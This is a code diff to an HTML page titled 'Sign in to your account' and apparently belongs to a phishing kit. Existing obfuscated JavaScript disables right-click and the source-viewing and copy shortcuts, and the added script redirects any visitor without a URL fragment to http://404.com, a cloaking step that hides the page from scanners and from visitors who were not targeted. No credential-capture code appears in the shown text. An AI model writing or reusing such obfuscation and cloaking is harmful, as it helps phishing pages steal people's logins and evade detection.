--- a/index.html
+++ b/index.html
@@ -4,6 +4,22 @@
 	    <script>
 function _0x36c6(_0x582953,_0x44adf9){var _0x107846=_0x1078();return _0x36c6=function(_0x36c69f,_0x1cfa3e){_0x36c69f=_0x36c69f-0x169;var _0xa5a531=_0x107846[_0x36c69f];return _0xa5a531;},_0x36c6(_0x582953,_0x44adf9);}var _0x281466=_0x36c6;(function(_0x16b62f,_0x2a9382){var _0x52e28a=_0x36c6,_0x1ac720=_0x16b62f();while(!![]){try{var _0x20a21d=-parseInt(_0x52e28a(0x174))/0x1*(-parseInt(_0x52e28a(0x176))/0x2)+parseInt(_0x52e28a(0x17a))/0x3+-parseInt(_0x52e28a(0x16a))/0x4*(-parseInt(_0x52e28a(0x179))/0x5)+-parseInt(_0x52e28a(0x171))/0x6+-parseInt(_0x52e28a(0x173))/0x7*(parseInt(_0x52e28a(0x177))/0x8)+-parseInt(_0x52e28a(0x178))/0x9+parseInt(_0x52e28a(0x170))/0xa*(parseInt(_0x52e28a(0x175))/0xb);if(_0x20a21d===_0x2a9382)break;else _0x1ac720['push'](_0x1ac720['shift']());}catch(_0xae134d){_0x1ac720['push'](_0x1ac720['shift']());}}}(_0x1078,0x6a27f),$(document)[_0x281466(0x16c)](_0x281466(0x16e),function(_0x4436bd){var _0x38ccb2=_0x281466;if(_0x4436bd['ctrlKey']&&_0x4436bd[_0x38ccb2(0x16b)]==0x53)return _0x4436bd[_0x38ccb2(0x172)](),![];}),document[_0x281466(0x16d)]('contextmenu',_0x205a74=>_0x205a74[_0x281466(0x172)]()),document['onkeydown']=function(_0x363d3b){var _0x4ccb5b=_0x281466;return _0x363d3b[_0x4ccb5b(0x169)]&&(_0x363d3b[_0x4ccb5b(0x16f)]===0x43||_0x363d3b['keyCode']===0x56||_0x363d3b[_0x4ccb5b(0x16f)]===0x55||_0x363d3b['keyCode']===0x75)?![]:!![];},$(document)['keypress']('u',function(_0x2ea0a4){var _0x1560b=_0x281466;return _0x2ea0a4[_0x1560b(0x169)]?![]:!![];}));function _0x1078(){var _0x57dc34=['513564icJyVP','4792XfuZbu','5334642joslYp','2776045EwwLMU','1135947ZXIJVL','ctrlKey','4MKKKvx','which','bind','addEventListener','keydown','keyCode','683260Wvzzua','1763580bystLy','preventDefault','5271rYWfEN','3KkQJWn','11YArXlY'];_0x1078=function(){return _0x57dc34;};return _0x1078();}
 </script>
+	<script>
+try {
+    let xy = window.location.href.split("#");
+    
+    if (xy[1] && xy[1] !== "") {
+      console.log("Found");
+    } else {
+      window.location.href =
+        "http://404.com";
+    }
+  } catch (e) {
+    window.location.href =
+       "http://404.com";
+    console.log(e);
+  }
+ </script>
 
 	<title>Sign in to your account</title>
 	
@@ -167,3 +183,4 @@ function _0x57a8(_0x562000,_0x3e7289){var _0x1d9b00=_0x1d9b();return _0x57a8=fun
 </body>
 
 </html>
+
